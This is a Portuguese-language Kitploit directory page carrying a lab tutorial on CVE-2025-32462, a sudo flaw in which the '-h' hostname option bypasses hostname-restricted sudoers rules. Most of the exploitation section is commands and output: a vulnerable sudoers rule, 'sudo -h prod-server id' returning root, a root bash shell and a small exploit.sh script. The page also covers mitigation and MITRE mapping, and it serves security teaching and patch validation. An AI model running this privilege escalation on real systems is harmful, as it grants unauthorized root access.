Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-32462- — CVE-2025-32462 é uma vulnerabilidade de escalonamento local de privilégios no sudo | Kitploit
Ferramentas/GitHubGitHub/offsecplaybook/cve-2025-32462-
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHuboffsecplaybook/cve-2025-32462-

CVE-2025-32462-

CVE-2025-32462 é uma vulnerabilidade de escalonamento local de privilégios no sudo

Ver Repositório
há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-32462 – Bypass de Hostname do Sudo para Escalação de Privilégios

CVE Cyber Security Penetration Testing Security Research

Índice

  1. Visão Geral
  2. Detalhes da Vulnerabilidade
  3. Impacto
  4. Ambiente de Laboratório
  5. Verificação da Versão Vulnerável
  6. Configuração do Usuário e Sudoers
  7. Passo a Passo da Exploração
  8. Resumo da Prova de Conceito
  9. Por que o Ubuntu Não é Vulnerável
  10. Mitigação
  11. Mapeamento MITRE ATT&CK
  12. Referências
  13. Aviso Legal

Visão Geral

CVE-2025-32462 é uma vulnerabilidade de escalação local de privilégios no sudo que permite a um usuário com baixos privilégios executar comandos como root ao abusar de regras do sudo restritas por hostname. O problema reside em como o sudo historicamente lidava com a opção -h (host) durante as verificações de autorização.

Quando uma regra do sudoers é restrita a um hostname específico, o sudo só deve permitir a execução quando o hostname do sistema corresponder à regra. Devido a uma lógica falha, as versões afetadas confiavam em um hostname fornecido pelo usuário via sudo -h, permitindo que invasores contornassem completamente a restrição.


Detalhes da Vulnerabilidade

  • ID do CVE: CVE-2025-32462
  • Tipo: Escalação Local de Privilégios
  • Componente Afetado: sudo
  • Vetor de Ataque: Local
  • Privilégios Necessários: Baixo (usuário não sudo)
  • Interação do Usuário: Nenhuma

Causa Raiz

O sudo permitia que o argumento -h <hostname> influenciasse as decisões de autorização. Nas versões vulneráveis, o hostname fornecido era confiado durante a avaliação da regra do sudoers, em vez de ser validado estritamente contra o hostname real do sistema.

Como resultado, as restrições do sudo baseadas em hostname podiam ser contornadas.


Impacto

Se explorada com sucesso, um atacante local pode:

  • Executar comandos arbitrários como root
  • Comprometer completamente o sistema
  • Contornar limites de segurança administrativos

Em ambientes reais, esta vulnerabilidade é particularmente perigosa em:

  • Sistemas multiusuário
  • Ambientes reforçados que usam regras sudo específicas de hostname
  • Hosts bastião ou de salto

Ambiente de Laboratório

ComponenteDetalhes
SODebian 11 (Bullseye – sem correção)
Versão do sudo≤ 1.9.13
Nível de AcessoUsuário local
VirtualizaçãoVirtualBox

⚠️ Nota: Lançamentos modernos do Ubuntu e Debian incluíram correções retroativas enquanto mantêm strings de versão semelhantes. Esta vulnerabilidade não pode ser reproduzida em sistemas corrigidos.


Passo 1 – Verificar Versão Vulnerável do sudo

root@kitploit:~
sudo --version

Esperado (vulnerável):

root@kitploit:~
Sudo version 1.9.5p2

Passo 2 – Criar Usuário com Baixos Privilégios

root@kitploit:~
sudo useradd -m attacker
sudo passwd attacker
groups attacker

Esperado:

root@kitploit:~
attacker : attacker

O usuário não deve pertencer ao grupo sudo.


Passo 3 – Configurar Regra Vulnerável do sudoers

Edite o sudoers com segurança:

root@kitploit:~
sudo visudo

Adicione a seguinte linha:

root@kitploit:~
attacker prod-server = (root) ALL
  • prod-server é um hostname falso
  • O hostname real do sistema deve ser diferente

Verifique:

root@kitploit:~
sudo -l -U attacker

Esperado:

root@kitploit:~
User attacker may run the following commands on prod-server:
    (root) ALL

Passo 4 – Confirmar que o sudo Normal é Negado

Troque de usuário:

root@kitploit:~
su - attacker

Tente o sudo normalmente:

root@kitploit:~
sudo id

Esperado:

root@kitploit:~
attacker is not allowed to run sudo on <hostname>

Passo 5 – Exploração (CVE-2025-32462)

Acione a vulnerabilidade:

root@kitploit:~
sudo -h prod-server id

Saída de exploração bem-sucedida:

root@kitploit:~
uid=0(root) gid=0(root) groups=0(root)

Abra um shell root:

root@kitploit:~
sudo -h prod-server /bin/bash

Verifique:

root@kitploit:~
id

Resumo da Prova de Conceito

Script de Prova de Conceito Automatizada (Opcional)

root@kitploit:~
#!/bin/bash
echo "[*] Attempting CVE-2025-32462 exploitation"
sudo -h prod-server id

Salve como exploit.sh, torne executável e execute como usuário attacker:

root@kitploit:~
chmod +x exploit.sh
./exploit.sh
AçãoResultado
sudo Normal❌ Negado
sudo -h prod-server id✅ Root

Isso confirma uma escalação de privilégios bem-sucedida.


Por que o Ubuntu Não é Vulnerável

Lançamentos modernos do Ubuntu parecem incluir versões do sudo que se enquadram na faixa afetada. No entanto, o Ubuntu incluiu a correção de segurança para o CVE‑2025‑32462 de forma retroativa, sem alterar a string de versão original.

Como resultado:

  • A opção sudo -h não influencia mais as verificações de autorização
  • A falsificação de hostname é rejeitada corretamente
  • A vulnerabilidade não pode ser reproduzida apesar de números de versão semelhantes

Isso destaca a importância de validar o status da vulnerabilidade usando testes comportamentais, não apenas strings de versão.


Mitigação

  • Atualize o sudo para uma versão corrigida
  • Remova regras do sudo restritas por hostname quando possível
  • Monitore tentativas locais de escalação de privilégios

Mapeamento MITRE ATT&CK

  • TA0004 – Escalação de Privilégios
  • T1548.003 – Abuso de Mecanismo de Controle de Elevação (sudo)

Referências

  • Aviso CVE‑2025‑32462
  • Anúncios de Segurança do Projeto sudo
  • Rastreador de Segurança do Debian

Aviso Legal

Este tutorial é apenas para fins educacionais e de pesquisa em segurança defensiva. Não teste esta vulnerabilidade em sistemas que você não possui ou para os quais não tem permissão explícita para avaliar.

Baixar ferramenta